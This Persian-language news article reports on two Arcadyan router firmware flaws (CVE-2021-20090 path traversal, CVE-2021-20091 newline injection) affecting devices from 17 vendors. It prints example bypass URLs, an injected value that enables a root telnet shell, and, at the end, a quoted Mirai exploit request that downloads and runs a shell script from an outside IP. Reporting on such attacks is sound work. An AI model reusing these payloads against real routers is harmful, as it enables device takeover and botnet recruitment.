آسیب پذیری در روترهای خانگی که 17 سازنده را تحت تأثیر قرار می دهد

یک حمله گسترده در شبکه علیه روترهای خانگی که سیستم عامل آنها از اجرای سرور HTTP از شرکت Arcadyan استفاده می کند، ثبت شده است. برای به دست آوردن کنترل بر روی دستگاه ها، ترکیبی از دو آسیب پذیری استفاده می شود که امکان اجرای از راه دور کد دلخواه با حقوق ریشه را فراهم می کند. این مشکل طیف نسبتاً گسترده‌ای از روترهای ADSL از Arcadyan، ASUS و Buffalo و همچنین دستگاه‌های عرضه‌شده تحت برندهای Beeline (مشکل در Smart Box Flash تأیید شده است)، Deutsche Telekom، Orange، O2، Telus، Verizon، Vodafone و سایر اپراتورهای مخابراتی خاطرنشان می شود که این مشکل بیش از 10 سال است که در فریمور Arcadyan وجود دارد و در این مدت توانسته به حداقل 20 مدل دستگاه از 17 سازنده مختلف مهاجرت کند.

اولین آسیب‌پذیری، CVE-2021-20090، دسترسی به هر اسکریپت رابط وب بدون احراز هویت را ممکن می‌سازد. ماهیت آسیب‌پذیری این است که در رابط وب، برخی از دایرکتوری‌ها که از طریق آنها تصاویر، فایل‌های CSS و اسکریپت‌های جاوا اسکریپت ارسال می‌شوند، بدون احراز هویت قابل دسترسی هستند. در این حالت دایرکتوری هایی که دسترسی بدون احراز هویت برای آنها مجاز است با استفاده از ماسک اولیه بررسی می شوند. مشخص کردن کاراکترهای "../" در مسیرها برای رفتن به فهرست والد توسط سیستم عامل مسدود شده است، اما استفاده از ترکیب "..%2f" نادیده گرفته می شود. بنابراین، هنگام ارسال درخواست هایی مانند "http://192.168.1.1/images/..%2findex.htm" می توان صفحات محافظت شده را باز کرد.

آسیب‌پذیری دوم، CVE-2021-20091، به کاربر تأیید شده اجازه می‌دهد تا با ارسال پارامترهای فرمت‌شده خاص به اسکریپت application_abstract.cgi، تغییراتی در تنظیمات سیستم دستگاه ایجاد کند، که وجود یک کاراکتر خط جدید را در پارامترها بررسی نمی‌کند. . به عنوان مثال، هنگام انجام یک عملیات پینگ، مهاجم می تواند مقدار "192.168.1.2%0AARC_SYS_TelnetdEnable=1" را در فیلدی که آدرس IP در حال بررسی است و اسکریپت را هنگام ایجاد فایل تنظیمات /tmp/etc/config/ مشخص کند. .glbcfg، خط "AARC_SYS_TelnetdEnable=1" را در آن می نویسد "، که سرور telnetd را فعال می کند، که دسترسی نامحدود به پوسته فرمان با حقوق ریشه را فراهم می کند. به همین ترتیب، با تنظیم پارامتر AARC_SYS، می توانید هر کدی را در سیستم اجرا کنید. اولین آسیب‌پذیری اجرای یک اسکریپت مشکل‌ساز را بدون احراز هویت با دسترسی به آن به‌عنوان “/images/..%2fapply_abstract.cgi” ممکن می‌سازد.

برای بهره برداری از آسیب پذیری ها، مهاجم باید بتواند درخواستی را به پورت شبکه ای که رابط وب روی آن اجرا می شود ارسال کند. با قضاوت بر اساس پویایی گسترش حمله، بسیاری از اپراتورها دسترسی به دستگاه های خود را از شبکه خارجی برای ساده سازی تشخیص مشکلات توسط سرویس پشتیبانی ترک می کنند. اگر دسترسی به اینترفیس فقط به شبکه داخلی محدود شود، می توان با استفاده از تکنیک "DNS rebinding" از یک شبکه خارجی حمله کرد. آسیب‌پذیری‌ها در حال حاضر به طور فعال برای اتصال روترها به بات‌نت Mirai استفاده می‌شوند: POST /images/..%2fapply_abstract.cgi اتصال HTTP/1.1: بستن User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time_3_5. 212.192.241.7%0A ARC_SYS_TelnetdEnable=1& %0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

منبع: opennet.ru

اضافه کردن نظر